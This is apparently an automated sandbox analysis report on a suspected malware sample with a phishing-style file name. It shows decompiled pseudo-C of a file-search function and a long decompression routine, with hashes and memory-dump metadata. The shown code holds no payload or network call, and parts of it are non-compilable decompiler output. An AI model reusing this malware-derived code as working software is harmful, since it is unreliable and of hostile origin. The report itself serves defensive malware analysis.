                                                                                                                                                                                  • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 39%
                                                                                                                                                                                  			E00402688(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A3A(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405C8D(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405D2F();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                                                                                                  0x004026a0
                                                                                                                                                                                  0x004026b4
                                                                                                                                                                                  0x004026bf
                                                                                                                                                                                  0x004026c0
                                                                                                                                                                                  0x004027f5
                                                                                                                                                                                  0x004026a2
                                                                                                                                                                                  0x004026a2
                                                                                                                                                                                  0x004026a4
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                                                                  • Opcode ID: bfc32a980be8afd774be7d36f6a04d6cd6616e565dcef0ba011c71aa6fcb6649
                                                                                                                                                                                  • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                                                                                                                                  • Opcode Fuzzy Hash: bfc32a980be8afd774be7d36f6a04d6cd6616e565dcef0ba011c71aa6fcb6649
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004064CB Relevance: .3, Instructions: 334COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                  			E004064CB(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406C3A( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4073f8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4073f8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406CA2( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406BFA))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x4093e4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x4093e4 + __eax * 2) & 0x0000ffff =  *(0x4093e4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x4093e4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x4093e4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x4093e4 + __eax * 2) & 0x0000ffff =  *(0x4093e4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x4093e4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406C3A( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406C3A( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42d380;
												if( *0x42d380 != 0) {
													L22:
													_t412 =  *0x409408; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40940c; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42c1fc; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42c1f8; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42c200;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42c680;
													if(_t416 < 0x42c680) {
														L15:
														__eflags = _t416 - 0x42c43c;
														_t438 = 8;
														if(_t416 > 0x42c43c) {
															__eflags = _t416 - 0x42c600;
															if(_t416 >= 0x42c600) {
																__eflags = _t416 - 0x42c660;
																if(_t416 < 0x42c660) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406CA2(0x42c200, 0x120, 0x101, 0x40740c, 0x40744c, 0x42c1fc, 0x409408, 0x42cb00, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42c200, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42c200 + _t440;
														E00406CA2(0x42c200, 0x1e, 0, 0x40748c, 0x4074c8, 0x42c1f8, 0x40940c, 0x42cb00, _t448 - 8);
														 *0x42d380 =  *0x42d380 + 1;
														__eflags =  *0x42d380;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040595D( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406C3A( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x4093e4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x4093e4 + __eax * 2) & 0x0000ffff =  *(0x4093e4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
